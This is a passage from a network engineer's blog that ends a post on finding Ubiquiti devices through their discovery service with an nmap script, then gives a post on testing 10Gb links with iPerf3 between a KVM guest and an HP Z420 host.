<pre style="line-height: 125%; margin: 0;"><span style="color: white;">sudo</span> <span style="color: white;">nmap</span> <span style="color: white;">-sU</span> <span style="color: white;">-p</span> <span style="color: #0086f7; font-weight: bold;">10001</span> <span style="color: white;">--script</span> <span style="color: #0086d2;">ubiquiti-discovery.nse</span> <span style="color: white;">-oG</span> <span style="color: white;">ubnt</span> <span style="color: #0086f7; font-weight: bold;">192.168.10.50</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">51</span> <span style="color: white;">|</span> <span style="color: white;">grep</span> <span style="color: white;">firmware</span>
<span style="color: white;">|</span> <span style="color: white;">firmware:</span> <span style="color: #0086d2;">WA.ar934x.v8.5.11.39842.190109.1449</span>
<span style="color: white;">|</span> <span style="color: white;">firmware:</span> <span style="color: #0086d2;">WA.ar934x.v8.5.11.39842.190109.1449</span>
</pre>
</div>
<br />
<br />
Remember, as always, only run discovery scripts on networks you have explicit permission on.<br />
<br />
<br />
<h3>
References</h3>
<a href="https://blog.rapid7.com/2019/02/01/ubiquiti-discovery-service-exposures/">Understanding Ubiquiti Discovery Service Exposures</a><br />
<a href="https://sonar.labs.rapid7.com/">Rapid7 Sonar Project</a><br />
<a href="https://blog.rapid7.com/2016/10/31/understanding-udp-amplification-vulnerabilities-through-rapid7-research/">Understanding UDP Amplification Vulnerabilities </a><br />
<a href="https://github.com/rapid7/metasploit-framework/pull/11338">Add Metasploit module to discover Ubiquiti devices</a><br />
<a href="https://community.ubnt.com/t5/EdgeRouter/UDP-broadcasts-on-port-10001/td-p/461223">UDP broadcasts on port 10001</a> - Ubiquiti KB on disabling discovery protocol<br />
<a href="https://help.ubnt.com/hc/en-us/articles/204976244-EdgeRouter-UBNT-Device-Discovery">EdgeRouter - Ubiquiti Device Discovery</a> - Ubiquiti KB on disabling discovery protocol on routers<br />
<a href="https://www.grc.com/sn/sn-700-notes.pdf">Security Now show notes</a> - Search for ubiquiti<br />
<a href="https://www.geeksforgeeks.org/hexdump-command-in-linux-with-examples/">hexdump command in Linux with examples</a><br />
<a href="https://www.linux.com/news/socat-general-bidirectional-pipe-handler">socat: The General Bidirectional Pipe Handler</a><br />
<a href="http://hilite.me/">Source Code Beautifier</a> - Used to create the code blocks in this blog<br />
<a href="https://www.shodan.io/">Shodan - Search Engine for the Internet of Things</a></div>
@rikosintiehttp://www.blogger.com/profile/12290070565813241791noreply@blogger.com0tag:blogger.com,1999:blog-690329124282786689.post-55620514954740340702018-09-08T23:23:00.000-07:002018-09-10T21:59:23.096-07:00Update to testing 10Gb links with iPerf3In a previous blog, I discussed using an HP Z420 workstation for testing 10Gb link quality. You can find it here - <a href="https://mwhubbard.blogspot.com/2018/08/using-iperf3-to-test-25gb5gb-and-10gb.html">Using iPerf3 to Test 2.5Gb/5Gb and 10Gb Links. </a><br />
<br />
The Z420 that I used has an Intel E5-1620 processor and 8GB of RAM. I purchased it on eBay for around $300. I just checked and a Z420 with an E5-2680 and 32GB of RAM is going for around $375. The extra RAM and faster processor would be nice.<br />
<br />
I added a 10Gb PCIe card from eBay - <b>666172-001 10GB MELLANOX PCIe 10GBe ETHERNET NIC</b> for $16.00. That allowed me to connect the Z420 to the customer's switch and run iPerf3. That worked great but I wanted a way to verify that the Z420 could actually run at a full 10Gb and be able to show the customer before I test.<br />
<br />
So, I decided to buy another 10Gb adapter and use a VM to test from the Z420's Ubuntu 18.04 host to the guest. I purchased the exact same adapter because the Mellanox driver was already installed and I knew it worked well.<br />
<br />
<h3>
Using KVM and Virt-manager</h3>
I decided to use KVM as the hypervisor and Virt-manager as the manager instead of VMware Workstation for this application. There are a few reasons I decided to use KVM:<br />
<ul>
<li>VMware workstation is a proprietary package that costs $199. Plus you have to keep maintenance on it or buy it again when the next version comes out. It's a great tool and I use it on my laptop, but I didn't want to spend the money on my server.</li>
<li>KVM is built into Linux and Virt-manager is a free, open-source tool. That means that KVM is automatically upgraded when the kernel is updated and Virt-manager will be updated by the Ubuntu package manager. </li>
<li>I'm studying Software Defined Networking and Linux is a big part of that. For example, NetAPP has a KVM based version of their SAN controller and customers will need help installing and optimizing it. There are also a lot of Linux servers running KVM in data centers and as a network engineer I want to know how to configure them for network access.</li>
</ul>
<br />
I am going to write another blog on how to get KVM up and running. It was a great experience and I learned quite a bit in the process since I had to install Virt-manager, create the bridge, modify firewall rules, and troubleshoot a communications issues that ultimately was caused by my Docker install. How much more fun could you have on a Saturday afternoon?<br />
<br />
<h3>
The results</h3>
I had a 10Gb 16 port switch in my lab and a couple of short DAC cables so connecting the two 10Gb adapters to my network was easy enough. Once I had KVM installed and the bridges created, I grabbed my Perfsonar toolkit ISO and built a CentOS 7 Perfsonar VM. The process was almost identical to VMware Workstation.<br />
<br />
Virt-manager makes it easy to clone VMs so before I started configuring the VM I cloned it using "virt-clone --original Perfsonar4-1 --name Perfsonar4-2 --auto-clone" from the terminal. The tool takes care of changing MAC addresses but you will need to change the hostname, ssh keys, etc.<br />
<br />
Here is what Virt-manager looked like with the two VMs created:<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAABTbEiXqcc7SVzZFc61kh4ji0A25UwDrVQAZxFyh4gN7tgzq2WVi_E3-K_ii9hnjl8Lcs5vXZ42gatsbfHrzOzum8lyKf4jL1KM9KKUMthKi4MPtOH1F0hHw4VQLbT-GyLUkEsL0WMy1/s1600/Selection_001.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="352" data-original-width="483" height="465" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAABTbEiXqcc7SVzZFc61kh4ji0A25UwDrVQAZxFyh4gN7tgzq2WVi_E3-K_ii9hnjl8Lcs5vXZ42gatsbfHrzOzum8lyKf4jL1KM9KKUMthKi4MPtOH1F0hHw4VQLbT-GyLUkEsL0WMy1/s640/Selection_001.png" width="640" /></a></div>
<br />
Networking in Virt-manager is similar to VMware Workstation. Here is a screenshot of the bridges:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLempTIAi7LfspJPfXKKs_QdzU__8UHMcCT3FJU4g1jkzAluKyNAhKoYcaR5ON41YwL0Z5D-UBn2ehQabtGvMv52sVm0Q7ImbPvghQPtWc2VMAscp_8BjaPPe7TUK-6_9lnRCYMLMsppSI/s1600/Selection_002.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="531" data-original-width="751" height="452" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLempTIAi7LfspJPfXKKs_QdzU__8UHMcCT3FJU4g1jkzAluKyNAhKoYcaR5ON41YwL0Z5D-UBn2ehQabtGvMv52sVm0Q7ImbPvghQPtWc2VMAscp_8BjaPPe7TUK-6_9lnRCYMLMsppSI/s640/Selection_002.png" width="640" /></a></div>
<br />
In the VM details, you select the Bridge to use. Virt-manager lists the Bridge name, BR0 in this case, and the physical interface on the host, ens3.<br />
<br />
One thing I learned is that you need to use the virtio device model. Initially, I selected E1000 based on my experience with VMware ESXi and it took me a few minutes to figure out why I was getting 941Gbps when testing!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx7WWSHkNoc9Lx09kNs5_VIrIkSCdJDAV6Cyw7g6ACW4HiPQZJyJzNqoShoqzXzMjgcivAgt-WpqMJWQ5K43BU4O2358N5y0RItiRx0eBs-YJtlS6u-Pb3XIcgyRBuATLLNGINzJ6c4s56/s1600/Selection_003.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="739" data-original-width="734" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx7WWSHkNoc9Lx09kNs5_VIrIkSCdJDAV6Cyw7g6ACW4HiPQZJyJzNqoShoqzXzMjgcivAgt-WpqMJWQ5K43BU4O2358N5y0RItiRx0eBs-YJtlS6u-Pb3XIcgyRBuATLLNGINzJ6c4s56/s640/Selection_003.png" width="634" /></a></div>
<br />
<br />
I was worried that the E5-1620 wouldn't have enough power to run the Z420 and the VM at 10Gb but it worked no problem. CPU utilization on the VM ran around 65% most of the time and maxed out at 77%.<br />
<br />
I only gave the VM 2 vCPUs, if it had maxed out, I would have been able to add another one. Here is a screenshot of HTOP that I grabbed on the VM during the test:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiCN6XfehtBHdvx42ih6HIxgi-9lDayUbiF9fYlWC6VgDfVYCQ5LpNx3XRekypo4RwBDMd2fH0zjGwFJtDuqRz3KCzNUijmGivkgYyN8h88tscq6zB2_ghfmdnJfUiOXVGEOI-mO6PRFLI/s1600/Selection_006.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="168" data-original-width="768" height="140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiCN6XfehtBHdvx42ih6HIxgi-9lDayUbiF9fYlWC6VgDfVYCQ5LpNx3XRekypo4RwBDMd2fH0zjGwFJtDuqRz3KCzNUijmGivkgYyN8h88tscq6zB2_ghfmdnJfUiOXVGEOI-mO6PRFLI/s640/Selection_006.png" width="640" /></a></div>
<br />
Here is the output from iPerf3 on the Z420. Notice there were no retries (Retr) after the first second and the Congestion Window (Cwnd) was very consistent.<br />
<br />
<br />
<!-- HTML generated using hilite.me --><br />
<div style="background: #111111; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;">
<pre style="line-height: 125%; margin: 0;"><span style="color: white;">mhubbard@Z420:~$</span> <span style="color: white;">iperf3</span> <span style="color: white;">-c</span> <span style="color: #0086f7; font-weight: bold;">192.168</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">10.187</span> <span style="color: white;">-P4</span> <span style="color: white;">-O2</span>
<span style="color: white;">Connecting</span> <span style="color: white;">to</span> <span style="color: white;">host</span> <span style="color: #0086f7; font-weight: bold;">192.168</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">10.187</span><span style="color: white;">,</span> <span style="color: white;">port</span> <span style="color: #0086f7; font-weight: bold;">5201</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">5</span><span style="color: white;">]</span> <span style="color: white;">local</span> <span style="color: #0086f7; font-weight: bold;">192.168</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">10.185</span> <span style="color: white;">port</span> <span style="color: #0086f7; font-weight: bold;">47044</span> <span style="color: white;">connected</span> <span style="color: white;">to</span> <span style="color: #0086f7; font-weight: bold;">192.168</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">10.187</span> <span style="color: white;">port</span> <span style="color: #0086f7; font-weight: bold;">5201</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">7</span><span style="color: white;">]</span> <span style="color: white;">local</span> <span style="color: #0086f7; font-weight: bold;">192.168</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">10.185</span> <span style="color: white;">port</span> <span style="color: #0086f7; font-weight: bold;">47046</span> <span style="color: white;">connected</span> <span style="color: white;">to</span> <span style="color: #0086f7; font-weight: bold;">192.168</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">10.187</span> <span style="color: white;">port</span> <span style="color: #0086f7; font-weight: bold;">5201</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">9</span><span style="color: white;">]</span> <span style="color: white;">local</span> <span style="color: #0086f7; font-weight: bold;">192.168</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">10.185</span> <span style="color: white;">port</span> <span style="color: #0086f7; font-weight: bold;">47048</span> <span style="color: white;">connected</span> <span style="color: white;">to</span> <span style="color: #0086f7; font-weight: bold;">192.168</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">10.187</span> <span style="color: white;">port</span> <span style="color: #0086f7; font-weight: bold;">5201</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">11</span><span style="color: white;">]</span> <span style="color: white;">local</span> <span style="color: #0086f7; font-weight: bold;">192.168</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">10.185</span> <span style="color: white;">port</span> <span style="color: #0086f7; font-weight: bold;">47050</span> <span style="color: white;">connected</span> <span style="color: white;">to</span> <span style="color: #0086f7; font-weight: bold;">192.168</span><span style="color: white;">.</span><span style="color: #0086f7; font-weight: bold;">10.187</span> <span style="color: white;">port</span> <span style="color: #0086f7; font-weight: bold;">5201</span>
<span style="color: white;">[</span> <span style="color: white;">ID]</span> <span style="color: white;">Interval</span> <span style="color: white;">Transfer</span> <span style="color: white;">Bitrate</span> <span style="color: white;">Retr</span> <span style="color: white;">Cwnd</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">5</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">0.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">1.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">310</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.60</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">35</span> <span style="color: #0086f7; font-weight: bold;">404</span> <span style="color: white;">KBytes</span> <span style="color: white;">(omitted)</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">7</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">0.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">1.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">267</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.24</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">78</span> <span style="color: #0086f7; font-weight: bold;">288</span> <span style="color: white;">KBytes</span> <span style="color: white;">(omitted)</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">9</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">0.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">1.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">236</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">1.98</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">85</span> <span style="color: #0086f7; font-weight: bold;">372</span> <span style="color: white;">KBytes</span> <span style="color: white;">(omitted)</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">11</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">0.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">1.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">239</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.00</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">111</span> <span style="color: #0086f7; font-weight: bold;">349</span> <span style="color: white;">KBytes</span> <span style="color: white;">(omitted)</span>
<span style="color: white;">[SUM]</span> <span style="color: #0086f7; font-weight: bold;">0.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">1.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">1.03</span> <span style="color: white;">GBytes</span> <span style="color: #0086f7; font-weight: bold;">8.82</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">309</span> <span style="color: white;">(omitted)</span>
<span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">5</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">1.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">2.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">281</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.36</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">417</span> <span style="color: white;">KBytes</span> <span style="color: white;">(omitted)</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">7</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">1.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">2.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">280</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">407</span> <span style="color: white;">KBytes</span> <span style="color: white;">(omitted)</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">9</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">1.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">2.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">279</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.34</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">440</span> <span style="color: white;">KBytes</span> <span style="color: white;">(omitted)</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">11</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">1.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">2.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">279</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.34</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">450</span> <span style="color: white;">KBytes</span> <span style="color: white;">(omitted)</span>
<span style="color: white;">[SUM]</span> <span style="color: #0086f7; font-weight: bold;">1.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">2.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">1.09</span> <span style="color: white;">GBytes</span> <span style="color: #0086f7; font-weight: bold;">9.39</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: white;">(omitted)</span>
<span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">5</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">0.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">1.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">279</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.34</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">428</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">7</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">0.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">1.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">280</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">407</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">9</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">0.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">1.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">279</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.34</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">491</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">11</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">0.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">1.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">280</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">452</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[SUM]</span> <span style="color: #0086f7; font-weight: bold;">0.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">1.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">1.09</span> <span style="color: white;">GBytes</span> <span style="color: #0086f7; font-weight: bold;">9.38</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span>
<span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">5</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">1.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">2.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">280</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">428</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">7</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">1.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">2.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">280</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">417</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">9</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">1.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">2.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">280</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">509</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">11</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">1.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">2.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">279</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.34</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">475</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[SUM]</span> <span style="color: #0086f7; font-weight: bold;">1.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">2.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">1.09</span> <span style="color: white;">GBytes</span> <span style="color: #0086f7; font-weight: bold;">9.39</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span>
<span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span> <span style="color: white;">-</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">5</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">2.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">3.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">280</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">437</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">7</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">2.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">3.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">280</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.35</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">420</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">9</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">2.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">3.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">279</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.34</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">533</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[</span> <span style="color: #0086f7; font-weight: bold;">11</span><span style="color: white;">]</span> <span style="color: #0086f7; font-weight: bold;">2.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">3.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">279</span> <span style="color: white;">MBytes</span> <span style="color: #0086f7; font-weight: bold;">2.34</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span> <span style="color: #0086f7; font-weight: bold;">498</span> <span style="color: white;">KBytes</span>
<span style="color: white;">[SUM]</span> <span style="color: #0086f7; font-weight: bold;">2.00</span><span style="color: white;">-</span><span style="color: #0086f7; font-weight: bold;">3.00</span> <span style="color: white;">sec</span> <span style="color: #0086f7; font-weight: bold;">1.09</span> <span style="color: white;">GBytes</span> <span style="color: #0086f7; font-weight: bold;">9.37</span> <span style="color: white;">Gbits/sec</span> <span style="color: #0086f7; font-weight: bold;">0</span>
